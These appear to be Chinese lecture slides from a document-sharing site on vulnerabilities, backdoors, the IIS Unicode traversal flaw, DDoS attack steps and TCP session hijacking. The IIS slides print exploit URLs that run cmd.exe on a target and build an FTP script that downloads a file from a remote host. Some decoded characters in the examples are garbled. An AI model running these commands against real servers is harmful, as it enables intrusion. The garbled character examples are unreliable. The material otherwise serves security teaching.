版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領
文檔簡介
系統(tǒng)漏洞和后門系統(tǒng)漏洞是程序中無意造成的缺陷,它形成了一個不被注意的通道。漏洞也指無意的配置錯誤,如使用默認服務器配置。后門是一個在操作系統(tǒng)或程序中無證明文件的通道,通常是由軟件開發(fā)人員故意放置在那里的,以便他們能夠快速對產(chǎn)品進行支持。
1-IISUNICODE漏洞NSFOCUS安全小組發(fā)現(xiàn)IIS4.0和IIS5.0在Unicode字符解碼的實現(xiàn)中存在一個安全漏洞,導致用戶可以遠程通過IIS執(zhí)行任意命令。當IIS打開文件時,如果該文件名包含unicode字符,它會對其進行解碼,如果用戶提供一些特殊的編碼,將導致IIS錯誤的打開或者執(zhí)行某些web根目錄以外的文件。2-IISUNICODE漏洞對于IIS5.0/4.0中文版,當IIS收到的URL請求的文件名中包含一個特殊的編碼例如"%c1%hh"或者"%c0%hh",它會首先將其解碼變成:0xc10xhh,然后嘗試打開這個文件,Windows系統(tǒng)認為0xc10xhh可能是unicode編碼,因此它會首先將其解碼,如果0x00<=%hh<0x40的話,采用的解碼的格式與下面的格式類似:
%c1%hh->(0xc1-0xc0)*0x40+0xhh
%c0%hh->(0xc0-0xc0)*0x40+0xhh3-IISUNICODE漏洞因此,利用這種編碼,我們可以構(gòu)造很多字符,例如:
%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c=‘/‘
%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f=‘‘
攻擊者可以利用這個漏洞來繞過IIS的路徑檢查,去執(zhí)行或者打開任意的文件。
4-IISUNICODE漏洞如果系統(tǒng)包含某個可執(zhí)行目錄,就可能執(zhí)行任意系統(tǒng)命令。下面的URL可能列出當前目錄的內(nèi)容:http://目標主機/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir利用這個漏洞查看系統(tǒng)文件內(nèi)容也是可能的:
http://目標主機/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
5-IIS漏洞/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe/scripts/ccc.exe?/c+echo+open>+getfile/scripts/ccc.exe?/c+type+getfile6-/scripts/ccc.exe?/c+echo+11>>+getfile/scripts/ccc.exe?/c+echo+administrator>>+getfile/scripts/ccc.exe?/c+echo+123456>>+getfile/scripts/ccc.exe?/c+echo+get+synful>>+getfile7-/scripts/ccc.exe?/c+echo+quit>>+getfile/scripts/ccc.exe?/c+ftp+-s:getfile8-拒絕服務攻擊DoS(DenialofService),其目的是使計算機或網(wǎng)絡無法提供正常的服務。最常見的DoS攻擊有計算機網(wǎng)絡帶寬攻擊和連通性攻擊。9-拒絕服務攻擊帶寬攻擊指以極大的通信量沖擊網(wǎng)絡,使得所有可用網(wǎng)絡資源都被消耗殆盡,最后導致合法的用戶請求就無法通過。連通性攻擊指用大量的連接請求沖擊計算機,使得所有可用的操作系統(tǒng)資源都被消耗殆盡,最終計算機無法再處理合法用戶的請求
10-分布式拒絕服務攻擊(DDoS,DistributedDenialofService)指借助于客戶/服務器技術(shù),將多個計算機聯(lián)合起來作為攻擊平臺,對一個或多個目標發(fā)動DoS攻擊,從而成倍地提高拒絕服務攻擊的威力。11-分布式拒絕服務攻擊DDoS攻擊手段是在傳統(tǒng)的DoS攻擊基礎之上產(chǎn)生的一類攻擊方式。單一的DoS攻擊一般是采用一對一方式的,當攻擊目標CPU速度低、內(nèi)存小或者網(wǎng)絡帶寬小等等各項性能指標不高時,它的效果是明顯的。12-分布式拒絕服務攻擊隨著計算機與網(wǎng)絡技術(shù)的發(fā)展,計算機的處理能力迅速增長,內(nèi)存大大增加,同時也出現(xiàn)了千兆級別的網(wǎng)絡,這使得DoS攻擊的困難程度加大了——目標對惡意攻擊包的"消化能力"加強了不少,例如你的攻擊軟件每秒鐘可以發(fā)送3,000個攻擊包,但我的主機與網(wǎng)絡帶寬每秒鐘可以處理10,000個攻擊包,這樣一來攻擊就不會產(chǎn)生什么效果。
13-分布式拒絕服務攻擊高速廣泛連接的網(wǎng)絡給大家?guī)砹朔奖?,也為DDoS攻擊創(chuàng)造了極為有利的條件。在低速網(wǎng)絡時代時,黑客占領攻擊用的傀儡機時,總是會優(yōu)先考慮離目標網(wǎng)絡距離近的機器,因為經(jīng)過路由器的跳數(shù)少,效果好。而現(xiàn)在電信骨干節(jié)點之間的連接都是以G為級別的,大城市之間更可以達到2.5G的連接,這使得攻擊可以從更遠的地方或者其他城市發(fā)起,攻擊者的傀儡機位置可以在分布在更大的范圍,選擇起來更靈活了。14-分布式拒絕服務攻擊通常,攻擊者使用一個偷竊帳號將DDoS主控程序安裝在一個計算機上,在一個設定的時間主控程序?qū)⑴c大量代理程序通訊,代理程序已經(jīng)被安裝在Internet上的許多計算機上。代理程序收到指令時就發(fā)動攻擊。利用客戶/服務器技術(shù),主控程序能在幾秒鐘內(nèi)激活成百上千次代理程序的運行。15-16-DDOS攻擊的步驟1.搜集了解目標的情況下列情況是黑客非常關(guān)心的情報:被攻擊目標主機數(shù)目、地址情況目標主機的配置、性能目標的帶寬17-DDOS攻擊的步驟2.占領傀儡機
黑客最感興趣的是有下列情況的主機:鏈路狀態(tài)好的主機性能好的主機安全管理水平差的主機18-2.占領傀儡機這一部分實際上是使用了另一大類的攻擊手段:利用形攻擊。這是和DDoS并列的攻擊方式。簡單地說,就是占領和控制被攻擊的主機。取得最高的管理權(quán)限,或者至少得到一個有權(quán)限完成DDoS攻擊任務的帳號。19-占領傀儡機對于一個DDoS攻擊者來說,準備好一定數(shù)量的傀儡機是一個必要的條件,下面說一下他是如何攻擊并占領它們的。20-占領傀儡機首先,黑客做的工作一般是掃描,隨機地或者是有針對性地利用掃描器去發(fā)現(xiàn)互聯(lián)網(wǎng)上那些有漏洞的機器,隨后就是嘗試入侵了,黑客現(xiàn)在占領了一臺傀儡機之后,除了做留后門擦腳印這些基本工作之外,他會把DDoS攻擊用的程序上載過去,一般是利用ftp。在攻擊機上,會有一個DDoS的發(fā)包程序,黑客就是利用它來向受害目標發(fā)送惡意攻擊包的。
21-DDOS攻擊的步驟3.實際攻擊經(jīng)過精心準備之后,黑客就象圖示里的那樣,登錄到做為控制臺的傀儡機,向所有的攻擊機發(fā)出命令。這時候埋伏在攻擊機中的DDoS攻擊程序就會響應控制臺的命令,一起向受害主機以高速度發(fā)送大量的數(shù)據(jù)包,導致它死機或是無法響應正常的請求。老到的攻擊者一邊攻擊,還會用各種手段來監(jiān)視攻擊的效果,在需要的時候進行一些調(diào)整。簡單些就是開個窗口不斷地ping目標主機,在能接到回應的時候就再加大一些流量或是再命令更多的傀儡機來加入攻擊。22-會話劫持你Telnet到某臺主機,這就是一次Telnet會話;你瀏覽某個網(wǎng)站,這就是一次HTTP會話。而會話劫持(SessionHijack),就是結(jié)合了嗅探以及欺騙技術(shù)在內(nèi)的攻擊手段。在一次正常的會話過程當中,攻擊者作為第三方參與到其中,他可以在正常數(shù)據(jù)包中插入惡意數(shù)據(jù),也可以在雙方的會話當中進行監(jiān)聽,甚至可以是代替某一方主機接管會話。23-會話劫持原理會話劫持利用了TCP/IP工作原理來設計攻擊。TCP使用端到端的連接,即(源IP,源TCP端口號,目的IP,目的TCP端號)來唯一標識每一條已經(jīng)建立連接的TCP鏈路。另外,TCP在進行數(shù)據(jù)傳輸時,TCP報文首部的兩個字段序號(seq)和確認序號(ackseq)非常重要。24-會話劫持原理序號(seq)和確認序號(ackseq)是與所攜帶TCP數(shù)據(jù)凈荷(payload)的多少有數(shù)值上的關(guān)系:序號字段(seq)指出了本報文中傳送的數(shù)據(jù)在發(fā)送主機所要傳送的整個數(shù)據(jù)流中的順序號,而確認序號字段(ackseq)指出了發(fā)送本報文的主機希望接收的對方主機中下一個八位組的順序號。25-會話劫持原理因此,對于一臺主機來說,其收發(fā)的兩個相臨TCP報文之間的序號和確認序號的關(guān)系為:它所要發(fā)出的報文中的seq值應等于它所剛收到的報文中的ackseq的值,而它所要發(fā)送報文中ackseq的值應為它所收到報文中seq的值加上該報文中所發(fā)送的TCP凈荷的長度。
26-會話劫持原理TCP會話劫持的攻擊方式可以對基于TCP的任何應用發(fā)起攻擊。對于攻擊者來說,所必須要做的就是窺探到正在進行TCP通信的兩臺主機之間傳送的報文,這樣攻擊者就可以得知該報文的源IP、源TCP端口號、目的IP、目的TCP端號,從而可以得知其中一臺主機對將要收到的下一個TCP報文段中seq和ackseq值的要求。27-會話劫持原理這樣,在該合法主機收到另一臺合法主機發(fā)送的TCP報文前,攻擊者根據(jù)所截獲的信息向該主機發(fā)出一個帶有凈荷的TCP報文,如果該主機先收到攻擊報文,就可以把合法的TCP會話建立在攻擊主機與被攻擊主機之間。28-會話劫持原理帶有凈荷的攻擊報文能夠使被攻擊主機對下一個要收到的TCP報文中的確認序號(ackseq)的值的要求發(fā)生變化,從而使另一臺合法的主機向被攻擊主機發(fā)出的報文被被攻擊主機拒絕。TCP會話劫持攻擊方式的好處在于使攻擊者避開了被攻擊主機對訪問者的身份驗證和安全認證,從而使攻擊者直接進入對被攻擊主機的的訪問狀態(tài),因此對系統(tǒng)安全構(gòu)成的威脅比較嚴重。29-會話劫持分類我們可以把會話劫持攻擊分為兩種類型:1)中間人攻擊(ManInTheMiddle,簡稱MITM),2)注射式攻擊(Injection);并且還可以把會話劫持攻擊分為兩種形式:1)被動劫持,2)主動劫持;被動劫持實際上就是在后臺監(jiān)視雙方會話的數(shù)據(jù)流,從中獲得敏感數(shù)據(jù);而主動劫持則是將會話當中的某一臺主機“踢”下線,然后由攻擊者取代并接管會話,30-中間人攻擊Man-in-the-MiddleAttack,(簡稱“MITM攻擊”)是一種“間接”的入侵攻擊,這種攻擊模式通過各種技術(shù)手段將受入侵者控制的一臺計算機虛擬放置在網(wǎng)絡連接中的兩臺通信計算機之間,這臺計算機就稱為“中間人”。31-中間人攻擊
然后入侵者把這臺計算機模擬一臺或兩臺原始計算機,使“中間人”能夠與原始計算機建立活動連接并允許其讀取或修改傳遞的信息,然而兩個原始計算機用戶卻認為他們是在互相通信。通常,這種“攔截數(shù)據(jù)——修改數(shù)據(jù)——發(fā)送數(shù)據(jù)”的過程就被稱為“會話劫持”(SessionHijack)。32-注射式攻擊它不會改變會話雙方的通訊流,而是在雙方正常的通訊流插入惡意數(shù)據(jù)。在注射式攻擊中,需要實現(xiàn)兩種技術(shù):1)IP欺騙,2)預測TCP序列號。如果是UDP協(xié)議,只需偽造IP地址,
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- CCAA - 2016年12月環(huán)境管理體系基礎答案及解析 - 詳解版(100題)
- CCAA - 2013服務標準化與服務認證(機構(gòu))答案及解析 - 詳解版(29題)
- 養(yǎng)老院緊急情況處理制度
- 企業(yè)員工培訓與發(fā)展制度
- 浙江省事業(yè)單位考試職業(yè)能力傾向測驗(醫(yī)療衛(wèi)生類E類)應考要點詳解
- 我國上市公司治理結(jié)構(gòu)、信息不對稱與自愿性信息披露的聯(lián)動效應及優(yōu)化路徑研究
- 重金屬回轉(zhuǎn)窯焙燒工操作規(guī)范考核試卷含答案
- 插秧機操作工安全宣教模擬考核試卷含答案
- 遺體火化師安全強化測試考核試卷含答案
- 乙炔發(fā)生工安全實操水平考核試卷含答案
- 福建省寧德市2025-2026學年高三上學期期末考試語文試題(含答案)
- 建筑施工行業(yè)2026年春節(jié)節(jié)前全員安全教育培訓
- 食品生產(chǎn)余料管理制度
- 2026年浦發(fā)銀行社會招聘備考題庫必考題
- 2026屆高考語文復習:小說人物形象復習
- 脫碳塔CO2脫氣塔設計計算
- 產(chǎn)品報價單貨物報價表(通用版)
- 皰疹性咽峽炎臨床路徑
- 中學保安工作管理制度
- 內(nèi)蒙古品味自然農(nóng)牧業(yè)公司VI設計理念
- 上腔靜脈綜合征的護理
評論
0/150
提交評論